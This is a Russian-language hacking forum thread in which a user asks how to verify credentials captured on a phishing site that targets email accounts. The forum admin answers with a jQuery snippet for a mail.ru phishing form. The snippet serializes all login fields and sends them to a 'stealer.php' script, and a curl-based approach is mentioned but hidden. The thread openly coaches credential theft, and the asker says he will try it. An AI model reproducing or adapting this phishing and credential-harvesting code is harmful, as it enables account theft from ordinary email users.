Основан 26 Июля 2013 года
freehacks.ru fhacksnplmzxaaoo.onion
/images/banners/468x60_free.png

Показано с 1 по 4 из 4
  1. #1
    TopicStarter


    Статус
    Offline
    Регистрация
    20.03.2015
    Сообщений
    5
    Репутация
    0 + / -
    Взлом

    Question Как сделать проверку на валидность

    Перебрал кучу статей, но реальной статьи так и не нашел.
    Может кто подскажет, как сделать проверку логин-пасс при вводе в форму на фиш сайте?
    Реально ли сделать в коде странице 2 action запроса ? 1 для отправки логин-пасс, 2 для синхронизации с сервером и вывода валидности.
    В моем случае дело обстоит так, на странице прописываю свой скрипт action="index.php" (к примеру). Сам скрипт обрабатывает и отправляет логин - пасс ко мне на мыло, а юзера отправляет на другую страницу, допустим на страницу "входящие", если фишим почту.
    Но много случаев когда кидают пароли с ошибками, или вообще свой старый, а может и от другой почты.
    В общем проблема в проверке на валидность, кто откроет глаза на эту вещь?

    Прошу прощение если на форума уже есть тема, не нашел.

  2. #2
    Trust
    Админ негодует :3
    Аватар для admin

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    1,710
    Репутация
    222 + / -
    Безопасность
    К примеру с помощью curl php . Вот пример, на работоспособность не проверял:
    [Только зарегистрированные могут видеть это. ]
    [Только зарегистрированные могут видеть это. ]
    JID: [Только зарегистрированные могут видеть это. ] - пока не сижу там, только ЛС.

  3. #3
    Trust
    Админ негодует :3
    Аватар для admin

    Статус
    Offline
    Регистрация
    27.07.2013
    Сообщений
    1,710
    Репутация
    222 + / -
    Безопасность
    Можно еще использовать jQuery :
    Пример для формы mail.ru

    [Только зарегистрированные могут видеть это. ]
    javascript код:
    $("#Auth").submit(function () { // Если отправляется форма, то
    var a = $("#Auth").serialize(); // Все поля с формы
    $.get("stealer.php?post=" + a); // Отправить на файл stealer.php в параметре post
    console.log(a); // Не обязательно, вывод в консоль браузера полей с формы
    });


    UPD: Добавил комментарии.
    Последний раз редактировалось admin; 21.03.2015 в 13:10.
    [Только зарегистрированные могут видеть это. ]
    JID: [Только зарегистрированные могут видеть это. ] - пока не сижу там, только ЛС.

  4. #4
    TopicStarter
    Аватар для Kurier

    Статус
    Offline
    Регистрация
    20.03.2015
    Сообщений
    5
    Репутация
    0 + / -
    Взлом
    Благодарю, попробую сделать.

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Информация на сайте предоставлена исключительно в ознакомительных целях, использование знаний в противозаконных целях преследуется по закону! Администрация не несет ответственности за ваши деяния.